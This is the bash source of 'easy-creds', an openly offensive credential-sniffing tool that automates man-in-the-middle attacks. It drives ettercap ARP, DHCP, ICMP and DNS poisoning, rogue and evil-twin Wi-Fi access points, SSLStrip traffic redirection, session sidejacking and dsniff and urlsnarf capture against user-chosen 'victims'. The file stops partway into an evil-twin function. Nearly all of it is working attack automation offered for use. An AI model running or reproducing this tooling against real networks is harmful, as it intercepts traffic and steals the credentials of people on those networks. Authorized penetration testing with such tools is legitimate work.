#!/bin/bash
##################################################################################################################
# easy-creds is a simple bash script which makes sniffing networks for credentials a little easier. #
# #
# J0hnnyBrav0 (@Brav0hax) & help from al14s (@al14s) #
##################################################################################################################
# v3.7.3 Garden of Your Mind - 12/11/2012
#
# Copyright (C) 2012 Eric Milam
# This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation; either version 2 of the License, or any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
##################################################################################################################
#
#Clear some variables
unset wireless
unset etterlaunch
unset offset
unset eviltwin
unset vercompare
unset dosattack
unset karmasploit
unset x
unset y
#Save the starting location path
location=$PWD
#Find the ettercap version. Will be used for f_whichetter
ettercapversion=$(ettercap -v|grep 2012|grep -o "0.7.4.2")
#Create the log folder in PWD
if [ -z $1 ]; then
logfldr=$PWD/easy-creds-$(date +%F-%H%M)
mkdir -p $logfldr
else
logfldr=$1
fi
# Catch ctrl-c input from user
trap f_Quit 2
#
# MISCELLANEOUS FUNCTIONS
#
##################################################
f_isxrunning(){
# Check to see if X is running
if [ -z $(pidof X) ] && [ -z $(pidof Xorg) ]; then
isxrunning=
else
isxrunning=1
fi
# Uncomment the following line to launch attacks in a screen session instead of an xterm window.
#unset isxrunning
if [ -z $isxrunning ]; then
echo -e "\n\e[1;31m[-] X Windows not detected, your attack will be launched in screen\e[0m\n"
sleep 2
fi
}
##################################################
f_findpaths(){
# Grab the paths from the config file
updatedb &> /dev/null
easy_creds_config=$(locate easy-creds.paths)
source $easy_creds_config
}
##################################################
f_xtermwindows(){
x="0" # x offset value
y="0" # y offset value
width="100" # width value
height="7" # height value
yoffset="120" # y offset
}
##################################################
f_checkexit(){
if [ -z $clean ]; then
f_Quit
else
rm -rf /tmp/ec &> /dev/null
clear
exit 2> /dev/null
fi
}
##################################################
f_Quit(){
echo -e "\n\n\e[1;33m[*] Please standby while we clean up your mess...\e[0m\n"
sleep 3
if [ -e /tmp/ec/sslstrip.pid ]; then kill $(cat /tmp/ec/sslstrip.pid); fi
if [ ! -z $(pidof hamster) ]; then kill $(pidof hamster); fi
if [ ! -z $(pidof ferret) ]; then kill $(pidof ferret); fi
if [ ! -z $(pidof ettercap) ]; then kill $(pidof ettercap); fi
if [ ! -z $(pidof urlsnarf) ]; then kill $(pidof urlsnarf); fi
if [ ! -z $(pidof dsniff) ]; then kill $(pidof dsniff); fi
if [ ! -z $wireless ]; then
kill $(pidof airbase-ng) $(pidof hamster) $(pidof ferret) $(cat /tmp/ec/tail.pid)
if [ -e /tmp/ec/sleep.pid ]; then kill $(cat /tmp/ec/sleep.pid); fi
service isc-dhcp-server stop &> /dev/null
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
#for $MONMODE in $(airmon-ng | grep mon | cut -f1); do #stop 'em all
airmon-ng stop $MONMODE &> /dev/null
#done
fi
echo "0" > /proc/sys/net/ipv4/ip_forward
if [ ! -z $dosattack ] ; then
airmon-ng stop $dosmon &> /dev/null
airmon-ng stop $airomon &> /dev/null
fi
if [ ! -z $karmasploit ] ; then
kill $(cat /tmp/ec/ec-karma-pid) &> /dev/null
kill $(cat /tmp/ec/ec-metasploit-pid) &> /dev/null
fi
if [ ! -z $fra ]; then
kill $(pidof radiusd) &> /dev/null
kill $(pidof hostapd) &> /dev/null
kill $(cat /tmp/ec/tail.pid) &> /dev/null
kill $(cat /tmp/ec/tshark.pid) &> /dev/null
mv $pathtoradiusconf/radiusd.conf.back $pathtoradiusconf/radiusd.conf
mv $pathtoradiusconf/clients.conf.back $pathtoradiusconf/clients.conf
echo "" > $freeradiuslog
fi
if [ "$mainchoice" == "5" ]; then
clear
rm -rf /tmp/ec
exit 2> /dev/null
fi
rm -rf /tmp/ec
bash $0 $logfldr
kill $$ 2> /dev/null
clean=1
}
##################################################
#
# PREREQ AND CONFIGURATION FUNCTIONS
#
##################################################
f_addtunnel(){
if [ -z $isxrunning ];then
if [ -e /etc/default/isc-dhcp-server ]; then
nano /etc/default/isc-dhcp-server
elif [ -e /etc/sysconfig/dhcpd ]; then
nano /etc/sysconfig/dhcpd
else
nano /etc/default/isc-dhcp-server
fi
else
if [ -e /etc/default/isc-dhcp-server ]; then
xterm -bg blue -fg white -geometry 90x25 -T "Add dhcpd Interface" -e nano /etc/default/isc-dhcp-server &
elif [ -e /etc/sysconfig/dhcpd ]; then
xterm -bg blue -fg white -geometry 90x25 -T "Add dhcpd Interface" -e nano /etc/sysconfig/dhcpd &
else
xterm -bg blue -fg white -geometry 90x25 -T "Add dhcpd Interface" -e nano /etc/default/isc-dhcp-server &
fi
fi
f_prereqs
}
##################################################
f_nanoetter(){
if [ -z $isxrunning ];then
nano /etc/etter.conf
else
xterm -bg blue -fg white -geometry 125x100-0+0 -T "Edit Etter Conf" -e nano /etc/etter.conf &
fi
f_prereqs
}
##################################################
f_nanoetterdns(){
if [ -z $isxrunning ];then
nano /usr/local/share/ettercap/etter.dns
else
xterm -bg blue -fg white -geometry 125x100-0+0 -T "Edit Etter DNS" -e nano /usr/local/share/ettercap/etter.dns &
fi
f_prereqs
}
##################################################
f_dhcp3install(){
clear
f_Banner
echo -e "\e[1;33m[*] Installing dhcp-server, please stand by.\e[0m\n"
if [ -e /etc/lsb-release ] || [ -e /etc/issue ]; then
apt-get update &> /dev/null && apt-get install isc-dhcp-server &> /dev/null
elif [ -e /etc/redhat-release ]; then
yum install dhcp* &> /dev/null
else
echo -e "\e[1;31m[-] I can't determine your OS, please install isc-dhcp-server manually\e[0m"
fi
echo -e "\n\e[1;32m[+] Finished installing dhcp3-server.\e[0m\n"
sleep 3
f_prereqs
}
##################################################
f_karmareqs(){
clear
f_Banner
echo -e "\e[1;33m[*] Installing Karmetasploit Prerequisites, please standby.\e[0m\n"
gem install activerecord
echo -e "\n\e[1;32m [+] Finished installing Karmetasploit Prerequisites.\e[0m\n"
sleep 3
f_prereqs
}
##################################################
f_msfupdate(){
clear
f_Banner
echo -e "\e[1;33m[*] Updating the Metasploit Framework, please stand by.\e[0m\n"
msfupdate
echo -e "\n\e[1;32m [+] Finished updating the Metasploit Framework.\e[0m\n"
sleep 3
f_prereqs
}
##################################################
f_aircrackupdate(){
clear
f_Banner
echo -e "\n\e[1;33m[*] Updating aircrack-ng from SVN, please be patient...\e[0m"
svn co http://trac.aircrack-ng.org/svn/trunk/ /tmp/ec/aircrack-ng
cd /tmp/ec/aircrack-ng/
make && make install > /dev/null
echo -e "\n\e[1;32m[+] Finished updating Aircrack.\e[0m\n"
sleep 2
echo -e "\e[1;33m[*] Updating airodump-ng OUI.\e[0m\n"
bash $airodumppath/airodump-ng-oui-update > /dev/null
echo -e "\n\e[1;32m[+] Finished updating Aircrack.\e[0m\n"
sleep 3
cd $location
f_prereqs
}
##################################################
f_sslstrip_vercheck(){
clear
f_Banner
echo -e "\n\e[1;33m[*] Checking the thoughtcrime website for the latest version of SSLStrip...\e[0m\n"
#Get the installed version
echo cat $sslstrippath/setup.py|grep version|cut -d "'" -f2
installedver=$(cat $sslstrippath/setup.py|grep version|cut -d "'" -f2)
# Change to tmp folder to keep things clean then get the index.html from thoughtcrime.com for SSLStrip
cd /tmp/ec
wget -q http://www.thoughtcrime.org/software/sslstrip/index.html
latestver=$(cat index.html | grep "cd sslstrip"| cut -d "-" -f2|cut -d "<" -f1)
cd $location
echo -e "\n\e[1;33m[*] Installed version of SSLStrip: $installedver\e[0m\n"
echo -e "\nLatest version of SSLStrip: $latestver\n"
if [ $(echo "$installedver < $latestver"|bc) == "1" ]; then
echo -e "\n\e[1;33m[*] You have version\e[0m \e[1;31m$installedver\e[0m \e[1;33m installed, version\e[0m \e[1;32m$latestver\e[0m \e[1;33m is available.\e[0m\n"
read -p "Would you like to install the latest version? [y/N]: " yn
if [ $(echo ${yn} | tr 'A-Z' 'a-z') == 'y' ]; then f_sslstripupdate; fi
else
echo -e "\n\e[1;32m[+] Looks like you're running the latest version available.\e[0m \n"
sleep 3
fi
f_prereqs
}
##################################################
f_sslstripupdate(){
clear
f_Banner
echo -e "\n\e[1;31m[-] This will install SSLStrip from the thoughtcrime website, not the repositories.\e[0m\n\e[1;33m[*] Hit return to continue or ctrl-c to cancel and return to main menu.\e[0"
read
cp -R "$sslstrippath" /tmp/ec/sslstrip-$installedver
echo -e "\n\e[1;33m[*] Downloading the tar file...\e[0m"
cd /tmp/ec/
wget -q http://www.thoughtcrime.org/software/sslstrip/sslstrip-$latestver.tar.gz
echo -e "\n\e[1;33m[*] Installing the latest version of SSLStrip...\e[0m"
tar -xvf sslstrip-$latestver.tar.gz
mv -f /tmp/ec/sslstrip-$latestver $sslstrippath/sslstrip
python $sslstrippath/setup.py install &> /dev/null
cd $location
echo -e "\n\e[1;32m[+] Version $latestver has been installed.\e[0m\n"
sleep 2
}
##################################################
f_howtos(){
xdg-open http://www.youtube.com/user/Brav0Hax/videos &
f_prereqs
}
##################################################
f_pbs(){
xdg-open http://www.youtube.com/watch?v=OFzXaFbxDcM &
f_mainmenu
}
##################################################
#
# POISONING ATTACK FUNCTIONS
#
##################################################
f_getvics(){
read -p "Do you have a populated file of victims to use? [y/N]: " VICFILE
if [ "$(echo ${VICFILE} | tr 'A-Z' 'a-z')" == "y" ]; then
VICLIST=
p=
if [ -e /tmp/victims ]; then p="[/tmp/victims]"; fi
while [ -z $VICLIST ]; do
read -e -p "Path to the victim list file $p : " VICLIST
if [ -z $VICLIST ] && [ -n $p ]; then VICLIST="/tmp/victims"; fi
done
else
VICS=
while [ -z $VICS ]; do read -p "IP address or range of IPs to poison (ettercap format): " VICS; done
fi
GW=
p=$(route | grep default | awk '{print $2}')
while [ -z $GW ]; do
read -p "IP address of the gateway [$p] : " GW
if [ -z $GW ];then GW=$p; fi
done
f_whichettercap
}
##################################################
f_whichettercap(){
if [ "$VICFILE" == "y" ]; then
case $poisoningchoice in
2) etterlaunch=1 ;;
3) etterlaunch=3 ;;
5) etterlaunch=8 ;;
esac
else
case $poisoningchoice in
2) etterlaunch=2 ;;
3) etterlaunch=4 ;;
5) etterlaunch=9 ;;
esac
fi
}
##################################################
f_HostScan(){
clear
f_Banner
range=
while [ -z "$range" ]; do read -p "Enter your target network range (nmap format): " range; done
echo -e "Performing an ARP scan to identify live devices - excluding our IPs.\n\nThis may take a bit.\n"
#take our addresses out of the mix ;)
myaddrs=$(printf "%s," $(ifconfig | grep "inet" | grep -v "127.0.0.1" | awk '{print $2}' | sed 's/addr://g'))
nmap -PR -n -sn $range --exclude $myaddrs -oN /tmp/ec/nmap.scan
grep -e report -e MAC /tmp/ec/nmap.scan | sed '{ N; s/\n/ /; s/Nmap scan report for //g; s/MAC Address: //g; s/ (.\+//g; s/$/ -/; }' > /tmp/victims
echo -e "\n\e[1;33m[*] Your victim host list is at /tmp/victims.\e[0m\n"
echo -e "\n\e[1;31m[-] Remember to remove any IPs that should not be poisoned!\e[0m\n"
read -p "Would you like to edit the victim host list? [y/N] : " yn
if [ $(echo $yn | tr 'A-Z' 'a-z') == "y" ]; then
if [ -z $isxrunning ];then
nano /tmp/victims
else
xterm -bg blue -fg white -geometry 125x100-0+0 -T "Edit Victims List" -e nano /tmp/victims &
fi
fi
f_poisoning
}
##################################################
f_setup(){
echo -e "Network Interfaces:\n"
ifconfig | awk '/Link encap:Eth/ {print;getline;print}' | sed '{ N; s/\n/ /; s/Link en.*.HWaddr//g; s/ Bcast.*//g; s/UP.*.:1//g; s/inet addr/IP/g; }' | sed '$a\\n'
IFACE=
while [ -z $IFACE ]; do
read -p "Interface connected to the network (ex. eth0): " IFACE
done
echo -e "\n\n\e[1;33m[*] Setting up iptables to handle traffic routing...\e[0m\n"
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 3
f_xtermwindows
}
##################################################
f_Standard(){
clear
f_Banner
f_setup
f_getvics
f_finalstage
f_mainmenu
}
##################################################
f_Oneway(){
clear
f_Banner
f_setup
f_getvics
f_finalstage
f_mainmenu
}
##################################################
f_DHCPPoison(){
clear
f_Banner
f_setup
etterlaunch=5
POOL=
while [ -z "$POOL" ]; do read -p "Pool of IP address to assign to your victims: " POOL; done
MASK=
while [ -z "$MASK" ]; do read -p "Netmask to assign to your victims: " MASK; done
DNS=
while [ -z "$DNS" ]; do read -p "DNS IP to assign to your victims: " DNS; done
f_finalstage
f_mainmenu
}
##################################################
f_DNSPoison(){
clear
f_Banner
f_setup
f_getvics
f_finalstage
f_mainmenu
}
##################################################
f_ICMPPoison(){
clear
f_Banner
f_setup
etterlaunch=6
GATEMAC=
while [ -z "$GATEMAC" ]; do read -p "MAC address of the gateway: " GATEMAC; done
GATEIP=
while [ -z "$GATEIP" ]; do read -p "IP address of the gateway: " GATEIP; done
f_finalstage
f_mainmenu
}
##################################################
f_sidejack(){
echo -e "\n\e[1;33m[*] Starting Hamster & Ferret...\e[0m\n"
cd $logfldr
screen -dmS SideJack -t ferret bash -c "$ferretpath/ferret -i $IFACE"
sleep 2
screen -S SideJack -t hamster -X screen $hamsterpath/hamster
cd $location
sleep 2
echo -e "\n\e[1;33m[*] Run firefox and type http://hamster\e[0m\n"
echo -e "\e[1;33m[*] Don't forget to set the proxy to 127.0.0.1:1234\e[0m\n"
sleep 5
}
##################################################
f_ecap(){
echo -e "\n\e[1;33m[*] Launching ettercap, poisoning specified hosts.\e[0m\n"
y=$(($y+$yoffset))
case $etterlaunch in
1) type="[arp:remote]"
c="ettercap -a /etc/etter.conf -M arp:remote -T -j $VICLIST -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW/ //" ;;
2) type="[arp:remote]"
c="ettercap -a /etc/etter.conf -M arp:remote -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW/ /$VICS/" ;;
3) type="[arp:oneway]"
c="ettercap -a /etc/etter.conf -M arp:oneway -T -j $VICLIST -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE // /$GW/" ;;
4) type="[arp:oneway]"
c="ettercap -a /etc/etter.conf -M arp:oneway -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$VICS/ /$GW/" ;;
5) type="[dhcp:$POOL/$MASK/$DNS/]"
c="ettercap -a /etc/etter.conf -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE -M dhcp:$POOL/$MASK/$DNS/" ;;
6) type="[icmp:$GATEMAC/$GATEIP]"
c="ettercap -a /etc/etter.conf -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE -M icmp:$GATEMAC/$GATEIP" ;;
7) type="[tunnel]"
c="ettercap -a /etc/etter.conf -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $TUNIFACE // //" ;;
8) type="[dns_spoof / arp]"
c="ettercap -a /etc/etter.conf -P dns_spoof -M arp -T -j $VICLIST -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW/ //" ;;
9) type="[dns_spoof / arp]"
c="ettercap -a /etc/etter.conf -P dns_spoof -M arp -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW/ /$VICS/" ;;
esac
if [ ! -z $isxrunning ]; then
xterm -geometry "$width"x$height-$x+$y -T "Ettercap - $type" -l -lf $logfldr/ettercap$(date +%F-%H%M).txt -bg white -fg black -e $c &
else
screen -S easy-creds -t ettercap -X screen $c
fi
ecpid=$(pidof ettercap)
}
##################################################
f_ecap_assimilation(){
#Used if version of ettercap is 0.7.5 and above. Target specification format changed for IPv6
echo -e "\n\e[1;33m[*] Launching ettercap, poisoning specified hosts.\e[0m\n"
y=$(($y+$yoffset))
case $etterlaunch in
1) type="[arp:remote]"
c="ettercap -a /etc/etter.conf -M arp:remote -T -j $VICLIST -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW// ///" ;;
2) type="[arp:remote]"
c="ettercap -a /etc/etter.conf -M arp:remote -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW// /$VICS//" ;;
3) type="[arp:oneway]"
c="ettercap -a /etc/etter.conf -M arp:oneway -T -j $VICLIST -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /// /$GW//" ;;
4) type="[arp:oneway]"
c="ettercap -a /etc/etter.conf -M arp:oneway -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$VICS// /$GW//" ;;
5) type="[dhcp:$POOL/$MASK/$DNS/]"
c="ettercap -a /etc/etter.conf -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE -M dhcp:$POOL/$MASK/$DNS/" ;;
6) type="[icmp:$GATEMAC/$GATEIP]"
c="ettercap -a /etc/etter.conf -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE -M icmp:$GATEMAC/$GATEIP" ;;
7) type="[tunnel]"
c="ettercap -a /etc/etter.conf -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $TUNIFACE /// ///" ;;
8) type="[dns_spoof / arp]"
c="ettercap -a /etc/etter.conf -P dns_spoof -M arp -T -j $VICLIST -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW// ///" ;;
9) type="[dns_spoof / arp]"
c="ettercap -a /etc/etter.conf -P dns_spoof -M arp -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW// /$VICS//" ;;
esac
if [ ! -z $isxrunning ]; then
xterm -geometry "$width"x$height-$x+$y -T "Ettercap - $type" -l -lf $logfldr/ettercap$(date +%F-%H%M).txt -bg white -fg black -e $c &
else
screen -S easy-creds -t ettercap -X screen $c
fi
ecpid=$(pidof ettercap)
}
##################################################
#
# FAKE AP ATTACK FUNCTIONS
#
##################################################
f_fakeapAttack(){
wireless=1
offset=1
# Credit to Lucafa's post on the Offensive-Security forums, used as a base
clear
f_Banner
f_xtermwindows
SIDEJACK=
read -p "Would you like to include a sidejacking attack? [y/N]: " SIDEJACK
SIDEJACK="$(echo ${SIDEJACK} | tr 'A-Z' 'a-z')"
echo -e "Network Interfaces:\n"
ifconfig | awk '/Link encap:Eth/ {print;getline;print}' | sed '{ N; s/\n/ /; s/Link en.*.HWaddr//g; s/ Bcast.*//g; s/UP.*.:1//g; s/inet addr/IP/g; }' | sed '$a\\n'
IFACE=
while [ -z "$IFACE" ]; do read -p "Interface connected to the internet (ex. eth0): " IFACE; done
wirelesscheck=$(airmon-ng | grep 'wlan')
if [ ! -z "$wirelesscheck" ]; then
airmon-ng
else
echo -e "\n\e[1;31m[-] I can't find a wireless interface to display...continuing anyway\e[0m\n"
sleep 5
fi
WIFACE=
while [ -z "$WIFACE" ]; do read -p "Wireless interface name (ex. wlan0): " WIFACE; done
if [ -z $eviltwin ]; then
ESSID=
while [ -z "$ESSID" ]; do read -p "ESSID you would like your rogue AP to be called, example FreeWiFi: " ESSID; done
CHAN=
while [ -z "$CHAN" ]; do read -p "Channel you would like to broadcast on: " CHAN; done
airmon-ng start $WIFACE $CHAN &> /dev/null
elif [ "$eviltwin" == "1" ]; then
airmon-ng start $WIFACE &> /dev/null
fi
modprobe tun
echo -e "\n\e[1;33m[*] Your interface has now been placed in Monitor Mode\e[0m\n"
airmon-ng | grep mon | sed '$a\\n'
MONMODE=
while [ -z "$MONMODE" ]; do read -p "Enter your monitor enabled interface name, (ex: mon0): " MONMODE; done
TUNIFACE=
while [ -z "$TUNIFACE" ]; do read -p "Enter your tunnel interface, example at0: " TUNIFACE; done
read -p "Do you have a dhcpd.conf file to use? [y/N]: " DHCPFILE
DHCPFILE=$(echo $DHCPFILE | tr 'A-Z' 'a-z')
if [ "$DHCPFILE" == "y" ]; then
f_dhcpconf
else
f_dhcpmanual
fi
f_dhcptunnel
}
##################################################
f_dhcpconf(){
dhcpdconf=
if [ -d /etc/dhcp]; then #Ubuntu/Debian dhcp3-server
dhcpdconf="/etc/dhcp/dhcpd.conf"
elif [ -e /etc/dhcpd.conf ]; then #redhat/fedora old
dhcpdconf="/etc/dhcpd.conf"
else
dhcpdconf="/etc/dhcp/dhcpd.conf" #Ubuntu/Debian/RH/Fedora isc-dhcp-server
fi
valid=
while [[ $valid != 1 ]]; do
read -e -p "Path to the dhcpd.conf file [$dhcpdconf]: " DHCPPATH
if [ -z "$DHCPPATH" ]; then DHCPPATH=$dhcpdconf; fi
if [ ! -f "$DHCPPATH" ]; then
echo -e "File not found - $DHCPPATH\n"
else
valid=1
fi
done
cat $DHCPPATH > /tmp/ec/dhcpd.conf
mv /tmp/ec/dhcpd.conf $dhcpdconf
DHCPPATH=$dhcpdconf
#If your DHCP conf file is setup properly, this will work, otherwise you need to tweak it
ATNET=$(cat $DHCPPATH |grep -i subnet|cut -d" " -f2)
ATIP=$(cat $DHCPPATH |grep -i "option routers"|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}')
ATSUB=$(cat $DHCPPATH |grep -i subnet|cut -d" " -f4)
ATCIDR=$(ipcalc -b $ATNET/$ATSUB|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\/[0-9]\{1,2\}')
}
##################################################
f_ipcalc(){
dhcpdconf=
if [ -d /etc/dhcp ]; then
dhcpdconf="/etc/dhcp/dhcpd.conf"
elif [ -e /etc/sysconfig/dhcpd ]; then
dhcpdconf="/etc/dhcpd.conf"
else
dhcpdconf="/etc/dhcp/dhcp.conf"
fi
DHCPPATH=$dhcpdconf
#use ipcalc to complete the DHCP setup
ipcalc "$ATCIDR" > /tmp/ec/atcidr
ATNET=$(cat /tmp/ec/atcidr|grep Address| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}')
ATIP=$(cat /tmp/ec/atcidr|grep HostMin| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}')
ATSUB=$(cat /tmp/ec/atcidr|grep Netmask| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}')
ATBROAD=$(cat /tmp/ec/atcidr|grep Broadcast| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}')
ATLSTARTTMP=$(cat /tmp/ec/atcidr|grep HostMin| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|cut -d"." -f1-3)
ATLSTART=$(echo $ATLSTARTTMP.100)
ATLENDTMP=$(cat /tmp/ec/atcidr|grep HostMax| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|cut -d"." -f1-3)
ATLEND=$(echo $ATLENDTMP.200)
echo -e "\n\n\e[1;33m[*] Creating a dhcpd.conf to assign addresses to clients that connect to us.\e[0m"
echo "ddns-update-style none;" > $DHCPPATH
echo "authoritative;" >> $DHCPPATH
echo "log-facility local7;" >> $DHCPPATH
echo "subnet $ATNET netmask $ATSUB {" >> $DHCPPATH
echo " range $ATLSTART $ATLEND;" >> $DHCPPATH
echo " option domain-name-servers $ATDNS;" >> $DHCPPATH
echo " option routers $ATIP;" >> $DHCPPATH
echo " option broadcast-address $ATBROAD;" >> $DHCPPATH
echo " default-lease-time 600;" >> $DHCPPATH
echo " max-lease-time 7200;" >> $DHCPPATH
echo "}" >> $DHCPPATH
}
##################################################
f_dhcpmanual(){
ATCIDR=
while [ -z "$ATCIDR" ]; do
read -p "Network range for your tunneled interface, example 10.0.0.0/24: " ATCIDR
if [[ ! $ATCIDR =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/[0-9]{1,2}$ ]]; then ATCIDR=; fi
done
ATDNS=
while [ -z "$ATDNS" ]; do read -p "Enter the IP address for the DNS server, example 8.8.8.8: " ATDNS; done
f_ipcalc
}
##################################################
f_dhcptunnel(){
etterlaunch=7
# airbase-ng is going to create our fake AP with the SSID we specified
echo -e "\n\e[1;33m[*] Launching Airbase with your settings.\e[0m"
if [ "$eviltwin" == "1" ] && [ -z $isxrunning ]; then
screen -dmS easy-creds -t Airbase-NG airbase-ng -P -C 60 -e "$ESSID" $MONMODE
elif [ "$eviltwin" == "1" ] && [ ! -z $isxrunning ]; then
xterm -geometry "$width"x$height-$x+$y -T "Airbase-NG" -e airbase-ng -P -C 60 -e "$ESSID" $MONMODE &
elif [ -z $isxrunning ]; then
screen -dmS easy-creds -t Airbasg-NG airbase-ng -e "$ESSID" -c $CHAN $MONMODE
else
xterm -geometry "$width"x$height-$x+$y -T "Airbase-NG" -e airbase-ng -e "$ESSID" -c $CHAN $MONMODE &
fi
sleep 7
echo -e "\n\e[1;33m[*] Configuring tunneled interface.\e[0m"
ifconfig "$TUNIFACE" up
ifconfig "$TUNIFACE" "$ATIP" netmask "$ATSUB"
ifconfig "$TUNIFACE" mtu 1500
route add -net "$ATNET" netmask "$ATSUB" gw "$ATIP" dev "$TUNIFACE"
sleep 2
echo -e "\n\e[1;33m[*] Setting up iptables to handle traffic seen by the tunneled interface.\e[0m"
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2
echo -e "\n\e[1;33m[*] Launching Tail.\e[0m"
if [ -z $isxrunning ]; then
screen -S easy-creds -t DMESG -X tail -f /var/log/messages
else
y=$(($y+$yoffset))
xterm -geometry "$width"x$height-$x+$y -T "DMESG" -bg black -fg red -e tail -f /var/log/messages &
fi
echo $! > /tmp/ec/tail.pid
sleep 3
echo -e "\n\e[1;33m[*] DHCP server starting on tunneled interface.\e[0m\n"
if [ -e /etc/dhcp/dhcpd.conf ]; then
dhcpd -q -cf $DHCPPATH -pf /var/run/isc-dhcp-server/dhcpd.pid $TUNIFACE &
elif [ -e /etc/sysconfig/dhcpd ]; then
systemctl start dhcpd.service
else
service dhcpd start
fi
sleep 3
f_finalstage
f_mainmenu
}
##################################################
f_finalstage(){
if [ -z $wireless ]; then
read -p "Would you like to include a sidejacking attack? [y/N]: " SIDEJACK
SIDEJACK="$(echo ${SIDEJACK} | tr 'A-Z' 'a-z')"
fi
if [ "$etterlaunch" -lt "8" ];then
if [ ! -z $isxrunning ]; then
echo -e "\n\e[1;33m[*] Launching SSLStrip...\e[0m\n"
if [ "$offset" == "1" ]; then
y=$(($y+$yoffset))
fi
sslstripfilename=sslstrip$(date +%F-%H%M).log
xterm -geometry "$width"x$height-$x+$y -bg blue -fg white -T "SSLStrip" -e sslstrip -pfk -w $logfldr/$sslstripfilename &
else
echo -e "\n\e[1;33m[*] Launching SSLStrip...\e[0m\n"
sslstripfilename=sslstrip$(date +%F-%H%M).log
screen -dmS easy-creds -t sslstrip -pfk -w $logfldr/$sslstripfilename
fi
fi
echo $! > /tmp/ec/sslstrip.pid
sleep 2
if [ -z "$ettercapversion" ]; then
f_ecap
else
f_ecap_assimilation
fi
sleep 3
echo -e "\n\e[1;33m[*] Configuring IP forwarding...\e[0m\n"
echo "1" > /proc/sys/net/ipv4/ip_forward
sleep 3
echo -e "\n\e[1;33m[*] Launching URLSnarf...\e[0m\n"
if [ "$wireless" == "1" ]; then
y=$(($y+$yoffset))
xterm -geometry "$width"x$height-$x+$y -T "URL Snarf" -l -lf $logfldr/urlsnarf-$(date +%F-%H%M).txt -bg black -fg green -e urlsnarf -i $TUNIFACE &
sleep 3
elif [ "$wireless" == "1" ] && [ -z $isxrunning ]; then
screen -S easy-creds -t urlsnarf -X screen urlsnarf -i $TUNIFACE
elif [ -z $wireless ] && [ -z $isxrunning ]; then
screen -S easy-creds -t urlsnarf -X screen urlsnarf -i $IFACE
screen -S easy-creds -X select 2
screen -S easy-creds -X logfile $logfldr/urlsnarf-$(date +%F-%H%M).txt
screen -S easy-creds -X log
else
y=$(($y+$yoffset))
xterm -geometry "$width"x$height-$x+$y -T "URL Snarf" -l -lf $logfldr/urlsnarf-$(date +%F-%H%M).txt -bg black -fg green -e urlsnarf -i $IFACE &
sleep 3
fi
echo -e "\n\e[1;33m[*] Launching Dsniff...\e[0m\n"
if [ "$wireless" == "1" ]; then
y=$(($y+$yoffset))
xterm -geometry "$width"x$height-$x+$y -T "Dsniff" -bg blue -fg white -e dsniff -m -i $TUNIFACE -w $logfldr/dsniff$(date +%F-%H%M).log &
sleep 3
elif [ "$wireless" == "1" ] && [ -z $isxrunning ]; then
screen -S easy-creds -t dsniff -X screen dsniff -m -i $TUNIFACE -w $logfldr/dsniff$(date +%F-%H%M).log
elif [ -z $wireless ] && [ -z $isxrunning ]; then
screen -S easy-creds -t dsniff -X screen dsniff -m -i $IFACE -w $logfldr/dsniff$(date +%F-%H%M).log
else
y=$(($y+$yoffset))
xterm -geometry "$width"x$height-$x+$y -T "Dsniff" -bg blue -fg white -e dsniff -m -i $IFACE -w $logfldr/dsniff$(date +%F-%H%M).log &
sleep 3
fi
if [ "$SIDEJACK" == "y" ]; then
f_sidejack
fi
echo -e "\n\e[1;33m[*] Do you ever imagine things in the garden of your mind?\e[0m"
sleep 5
}
##################################################
f_fakeapeviltwin(){
